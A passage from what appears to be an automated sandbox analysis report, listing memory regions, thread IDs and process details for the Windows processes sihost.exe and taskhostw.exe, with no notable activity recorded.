- |
| vedatamodel.edb | 0xdaf83f0000 | 0xdaf83fffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8400000 | 0xdaf840ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8510000 | 0xdaf851ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8520000 | 0xdaf852ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8530000 | 0xdaf853ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000daf8640000 | 0xdaf8640000 | 0xdaf873ffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf8740000 | 0xdaf874ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8750000 | 0xdaf875ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8760000 | 0xdaf876ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8770000 | 0xdaf877ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8780000 | 0xdaf878ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8790000 | 0xdaf879ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf87a0000 | 0xdaf87affff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf87b0000 | 0xdaf87bffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf87c0000 | 0xdaf87cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf87d0000 | 0xdaf87dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf87e0000 | 0xdaf87effff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf87f0000 | 0xdaf87fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000daf8800000 | 0xdaf8800000 | 0xdaf88fffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf8900000 | 0xdaf890ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8910000 | 0xdaf891ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8920000 | 0xdaf892ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000daf8a30000 | 0xdaf8a30000 | 0xdaf8b2ffff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf8b30000 | 0xdaf8b3ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8b40000 | 0xdaf8b4ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8b50000 | 0xdaf8b5ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8b60000 | 0xdaf8b6ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000daf8b70000 | 0xdaf8b70000 | 0xdaf8b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8b80000 | 0xdaf8b8ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8b90000 | 0xdaf8b9ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8ba0000 | 0xdaf8baffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8bb0000 | 0xdaf8bbffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8bc0000 | 0xdaf8bcffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8bd0000 | 0xdaf8bdffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8be0000 | 0xdaf8beffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8bf0000 | 0xdaf8bfffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c00000 | 0xdaf8c0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c10000 | 0xdaf8c1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c20000 | 0xdaf8c2ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c30000 | 0xdaf8c3ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c40000 | 0xdaf8c4ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c50000 | 0xdaf8c5ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c60000 | 0xdaf8c6ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c70000 | 0xdaf8c7ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c80000 | 0xdaf8c8ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8c90000 | 0xdaf8c9ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8ca0000 | 0xdaf8caffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8cb0000 | 0xdaf8cbffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8cc0000 | 0xdaf8ccffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000daf8cd0000 | 0xdaf8cd0000 | 0xdaf8cd0fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xdaf8ce0000 | 0xdaf8ceffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8d00000 | 0xdaf8d0ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8d10000 | 0xdaf8d1ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8d20000 | 0xdaf8d2ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xdaf8d30000 | 0xdaf8d3ffff | Memory Mapped File | r |
|
|
|
- |
|
For performance reasons, the remaining 50 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #62: sihost.exe
0
0
| Information | Value |
|---|---|
| ID | #62 |
| File Name | c:\windows\system32\sihost.exe |
| Command Line | sihost.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x704 |
| Parent PID | 0x324 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C70
0x
C8C
0x
948
0x
968
0x
950
0x
490
0x
46C
0x
7CC
0x
7C8
0x
7BC
0x
7B0
0x
7AC
0x
774
0x
770
0x
76C
0x
708
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000001e5f0d0000 | 0x1e5f0d0000 | 0x1e5f0dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000001e5f0e0000 | 0x1e5f0e0000 | 0x1e5f0e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001e5f0f0000 | 0x1e5f0f0000 | 0x1e5f103fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001e5f110000 | 0x1e5f110000 | 0x1e5f18ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001e5f190000 | 0x1e5f190000 | 0x1e5f193fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001e5f1a0000 | 0x1e5f1a0000 | 0x1e5f1a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x1e5f1b0000 | 0x1e5f26dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001e5f270000 | 0x1e5f270000 | 0x1e5f2effff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e5f2f0000 | 0x1e5f2f0000 | 0x1e5f2f6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e5f300000 | 0x1e5f300000 | 0x1e5f300fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e5f310000 | 0x1e5f310000 | 0x1e5f310fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001e5f320000 | 0x1e5f320000 | 0x1e5f320fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001e5f330000 | 0x1e5f330000 | 0x1e5f330fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001e5f340000 | 0x1e5f340000 | 0x1e5f43ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e5f440000 | 0x1e5f440000 | 0x1e5f53ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e5f540000 | 0x1e5f540000 | 0x1e5f54ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001e5f550000 | 0x1e5f550000 | 0x1e5f6d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001e5f6e0000 | 0x1e5f6e0000 | 0x1e5f860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001e5f870000 | 0x1e5f870000 | 0x1e60c6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x1e60c70000 | 0x1e60fa6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001e60fb0000 | 0x1e60fb0000 | 0x1e6102ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61030000 | 0x1e61030000 | 0x1e610affff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e610b0000 | 0x1e610b0000 | 0x1e6112ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61130000 | 0x1e61130000 | 0x1e611affff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e611b0000 | 0x1e611b0000 | 0x1e6122ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61230000 | 0x1e61230000 | 0x1e612affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001e612b0000 | 0x1e612b0000 | 0x1e612d9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000001e612f0000 | 0x1e612f0000 | 0x1e612fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61300000 | 0x1e61300000 | 0x1e613fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61400000 | 0x1e61400000 | 0x1e61bfffff | Private Memory | - |
|
|
|
- |
| private_0x0000001e61c00000 | 0x1e61c00000 | 0x1e61c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61c80000 | 0x1e61c80000 | 0x1e61cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61d00000 | 0x1e61d00000 | 0x1e61d7ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x1e61d80000 | 0x1e61e5efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001e61e60000 | 0x1e61e60000 | 0x1e61edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61ee0000 | 0x1e61ee0000 | 0x1e61f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e61fe0000 | 0x1e61fe0000 | 0x1e6205ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e62060000 | 0x1e62060000 | 0x1e620dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001e620e0000 | 0x1e620e0000 | 0x1e621dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff450000 | 0x7df5ff450000 | 0x7ff5ff44ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7050ac000 | 0x7ff7050ac000 | 0x7ff7050adfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050ae000 | 0x7ff7050ae000 | 0x7ff7050affff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050b2000 | 0x7ff7050b2000 | 0x7ff7050b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050b4000 | 0x7ff7050b4000 | 0x7ff7050b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050b6000 | 0x7ff7050b6000 | 0x7ff7050b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050b8000 | 0x7ff7050b8000 | 0x7ff7050b9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050ba000 | 0x7ff7050ba000 | 0x7ff7050bbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050bc000 | 0x7ff7050bc000 | 0x7ff7050bdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7050be000 | 0x7ff7050be000 | 0x7ff7050bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7050c0000 | 0x7ff7050c0000 | 0x7ff7051bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7051c0000 | 0x7ff7051c0000 | 0x7ff7051e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7051e3000 | 0x7ff7051e3000 | 0x7ff7051e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7051e5000 | 0x7ff7051e5000 | 0x7ff7051e5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7051e6000 | 0x7ff7051e6000 | 0x7ff7051e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7051e8000 | 0x7ff7051e8000 | 0x7ff7051e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7051ea000 | 0x7ff7051ea000 | 0x7ff7051ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7051ec000 | 0x7ff7051ec000 | 0x7ff7051edfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7051ee000 | 0x7ff7051ee000 | 0x7ff7051effff | Private Memory | rw |
|
|
|
- |
| sihost.exe | 0x7ff705a50000 | 0x7ff705a65fff | Memory Mapped File | rwx |
|
|
|
- |
| staterepository.core.dll | 0x7ffc46310000 | 0x7ffc463a8fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.staterepository.dll | 0x7ffc463b0000 | 0x7ffc46641fff | Memory Mapped File | rwx |
|
|
|
- |
| licensemanagerapi.dll | 0x7ffc488a0000 | 0x7ffc488abfff | Memory Mapped File | rwx |
|
|
|
- |
| twinui.appcore.dll | 0x7ffc48970000 | 0x7ffc48b7cfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelproxy.dll | 0x7ffc48b80000 | 0x7ffc48b94fff | Memory Mapped File | rwx |
|
|
|
- |
| sharehost.dll | 0x7ffc48c80000 | 0x7ffc48d24fff | Memory Mapped File | rwx |
|
|
|
- |
| appcontracts.dll | 0x7ffc48d30000 | 0x7ffc48ddbfff | Memory Mapped File | rwx |
|
|
|
- |
| wpportinglibrary.dll | 0x7ffc48de0000 | 0x7ffc48de8fff | Memory Mapped File | rwx |
|
|
|
- |
| modernexecserver.dll | 0x7ffc48df0000 | 0x7ffc48ec7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsclient.dll | 0x7ffc48ed0000 | 0x7ffc48edbfff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatypehelperutil.dll | 0x7ffc48ee0000 | 0x7ffc48ef0fff | Memory Mapped File | rwx |
|
|
|
- |
| appointmentactivation.dll | 0x7ffc48f00000 | 0x7ffc48f21fff | Memory Mapped File | rwx |
|
|
|
- |
| activationmanager.dll | 0x7ffc48f30000 | 0x7ffc48f8dfff | Memory Mapped File | rwx |
|
|
|
- |
| edputil.dll | 0x7ffc48f90000 | 0x7ffc48fbefff | Memory Mapped File | rwx |
|
|
|
- |
| clipboardserver.dll | 0x7ffc48fc0000 | 0x7ffc48feffff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc48ff0000 | 0x7ffc49459fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.shell.servicehostbuilder.dll | 0x7ffc49460000 | 0x7ffc49471fff | Memory Mapped File | rwx |
|
|
|
- |
| desktopshellext.dll | 0x7ffc49480000 | 0x7ffc49496fff | Memory Mapped File | rwx |
|
|
|
- |
| coreuicomponents.dll | 0x7ffc49bb0000 | 0x7ffc49e10fff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandbrokerclient.dll | 0x7ffc4b000000 | 0x7ffc4b010fff | Memory Mapped File | rwx |
|
|
|
- |
| notificationplatformcomponent.dll | 0x7ffc4b020000 | 0x7ffc4b02cfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffc4b030000 | 0x7ffc4b072fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffc4ddd0000 | 0x7ffc4e145fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ffc4f8f0000 | 0x7ffc4f981fff | Memory Mapped File | rwx |
|
|
|
- |
| policymanager.dll | 0x7ffc4f990000 | 0x7ffc4f9c8fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffc4fb00000 | 0x7ffc4fb35fff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffc50c00000 | 0x7ffc50d30fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrproxy.dll | 0x7ffc50d40000 | 0x7ffc50d7dfff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffc51340000 | 0x7ffc513b1fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffc51410000 | 0x7ffc5141ffff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ffc525f0000 | 0x7ffc52611fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffc52730000 | 0x7ffc527f7fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ffc52f40000 | 0x7ffc5302dfff | Memory Mapped File | rwx |
|
|
|
- |
| rmclient.dll | 0x7ffc531b0000 | 0x7ffc531d7fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc53830000 | 0x7ffc5383bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffc53920000 | 0x7ffc53951fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc54670000 | 0x7ffc54c97fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #63: taskhostw.exe
0
0
| Information | Value |
|---|---|
| ID | #63 |
| File Name | c:\windows\system32\taskhostw.exe |
| Command Line | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x77c |
| Parent PID | 0x324 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C6C
0x
82C
0x
B7C
0x
AB0
0x
A2C
0x
940
0x
93C
0x
938
0x
934
0x
7B4
0x
780
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000a699760000 | 0xa699760000 | 0xa69976ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a699770000 | 0xa699770000 | 0xa699776fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a699780000 | 0xa699780000 | 0xa699793fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a6997a0000 | 0xa6997a0000 | 0xa69981ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a699820000 | 0xa699820000 | 0xa699823fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a699830000 | 0xa699830000 | 0xa699830fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a699840000 | 0xa699840000 | 0xa699841fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a699850000 | 0xa699850000 | 0xa699856fff | Private Memory | rw |
|
|
|
- |
| taskhostw.exe.mui | 0xa699860000 | 0xa699860fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a699870000 | 0xa699870000 | 0xa699870fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a699880000 | 0xa699880000 | 0xa699880fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a699890000 | 0xa699890000 | 0xa699893fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a6998a0000 | 0xa6998a0000 | 0xa6998a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a6998b0000 | 0xa6998b0000 | 0xa6999affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xa6999b0000 | 0xa699a6dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a699a70000 | 0xa699a70000 | 0xa699aeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a699af0000 | 0xa699af0000 | 0xa699b6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a699b70000 | 0xa699b70000 | 0xa699c27fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a699c30000 | 0xa699c30000 | 0xa699c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a699c40000 | 0xa699c40000 | 0xa699c40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a699c50000 | 0xa699c50000 | 0xa699c50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a699c60000 | 0xa699c60000 | 0xa699c60fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a699c70000 | 0xa699c70000 | 0xa699c7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a699c80000 | 0xa699c80000 | 0xa699e07fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a699e10000 | 0xa699e10000 | 0xa699f90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a699fa0000 | 0xa699fa0000 | 0xa69b39ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a69b3a0000 | 0xa69b3a0000 | 0xa69b41ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69b420000 | 0xa69b420000 | 0xa69b420fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a69b430000 | 0xa69b430000 | 0xa69b43ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69b440000 | 0xa69b440000 | 0xa69b44ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69b450000 | 0xa69b450000 | 0xa69b45ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69b460000 | 0xa69b460000 | 0xa69b46ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69b470000 | 0xa69b470000 | 0xa69b47ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69b480000 | 0xa69b480000 | 0xa69b48ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a69b490000 | 0xa69b490000 | 0xa69b497fff | Private Memory | rw |
|
|
|
- |
| winmm.dll.mui | 0xa69b4a0000 | 0xa69b4a5fff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa69b4b0000 | 0xa69b4bffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa69b4c0000 | 0xa69b4cffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000a69b4d0000 | 0xa69b4d0000 | 0xa69b4dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0xa69b4e0000 | 0xa69b4effff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa69b4f0000 | 0xa69b4fffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa69b500000 | 0xa69b50ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0xa69b510000 | 0xa69b51ffff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0xa69b520000 | 0xa69b856fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a69b860000 | 0xa69b860000 | 0xa69b8dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69b8e0000 | 0xa69b8e0000 | 0xa69b95ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a69b960000 | 0xa69b960000 | 0xa69ba5ffff | Private Memory | rw |
|
|
|
- |
| msctfmonitor.dll.mui | 0xa69ba60000 | 0xa69ba60fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a69ba70000 | 0xa69ba70000 | 0xa69baeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a69baf0000 | 0xa69baf0000 | 0xa69baf0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a69bb00000 | 0xa69bb00000 | 0xa69bb06fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a69bb10000 | 0xa69bb10000 | 0xa69bb1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69bb20000 | 0xa69bb20000 | 0xa69bb2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a69bb30000 | 0xa69bb30000 | 0xa69bb3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
